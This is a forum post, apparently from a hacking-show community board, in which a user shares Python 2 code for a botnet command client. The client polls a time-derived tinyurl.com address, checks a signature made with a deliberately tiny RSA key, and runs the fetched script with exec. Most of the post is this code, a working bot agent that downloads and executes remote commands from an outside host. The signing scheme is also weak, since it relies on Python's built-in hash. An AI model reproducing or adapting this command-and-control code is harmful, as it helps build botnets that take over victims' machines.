Jump to content

Botnet Command; Ep701


N3Ar
 Share

Recommended Posts

Hey guys I just watched the show, episode 701, and Mr daren made a comment about everyone beeing able to send commands to the botnet. He also asked what kind of language could be used(and he mentioned python).

Well I think that hashing the script+signing the script using an RSA key would do the trick.. I'm using the tinyurl idea, anyways i wrote a litle piece of code, so everyone could get the idea..

import urllib2
import time
#I'm using the build-in commands to make everything simple to understand.

#i used on purpose a very small rsa key. Here is the private part:
#1010693124043243545751267641549720737580824554323031507505058361376182502064774
3669133551435099535035835371621642498954346254965071187678761958624260885369
exp=3
rsakey=6737954160288290305008450943664804917205497028820210050033722409174550013
76502819075007717863922529820033825362060571087308695102967167320217085438219053
1

def check_web ():
    nowis=time.asctime()
    i=abs(hash(nowis))   #you MUST change this hashing function!
    print "opening http://tinyurl.com/%s"%i
    web=urllib2.urlopen("http://tinyurl.com/%s"%i)
    text=web.read()
    web.close()
    if "Please check that the URL entered is correct. To learn more about TinyURL.com, please visit the" in text:
        print "the url did not exist!"
    else :
        print "url found!"
        if "###END###" in text:
            try:
                script,key=text.split("###END###")
                key=int(key)
            except:
                print 'more than one "###END###" in text'
            else:  #will be executed if exception doesn't occur
                if pow(key,exp,rsakey)==abs(hash(script+nowis)):
                    # This is the reason why i wrote it in python:                    
                    exec script
        else :
            print 'no "###END###" in text'

while 1:
    time.sleep(1)
    check_web()

and it does work prety well... Note that if i use script+nowis for the hash, it is because i want a command to be executed only once.

And it makes me think, there was a big trojan recently that used the same idea, but with domain names ^^$

Anyways, i'd like some feedback, your ideas..

Edited by N3Ar
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...